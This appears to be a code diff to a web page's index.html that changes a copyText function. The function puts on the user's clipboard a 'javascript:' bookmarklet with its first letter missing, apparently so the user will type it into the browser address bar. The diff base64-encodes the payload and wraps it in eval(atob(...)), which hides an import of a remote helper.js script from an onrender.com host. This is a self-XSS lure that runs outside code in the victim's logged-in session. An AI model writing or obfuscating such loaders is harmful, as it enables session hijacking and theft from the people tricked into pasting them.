--- a/index.html
+++ b/index.html
@@ -10,8 +10,9 @@
 
     <script>
         function copyText() {
-            navigator.clipboard.writeText('avascript:import("https://young-p1x2.onrender.com/helper.js")');
+            navigator.clipboard.writeText('avascript:(()=>{eval(atob("aW1wb3J0KCJodHRwczovL3lvdW5nLXAxeDIub25yZW5kZXIuY29tL2hlbHBlci5qcyIp") )})()');
         }
     </script>
 </body>
+
 </html>
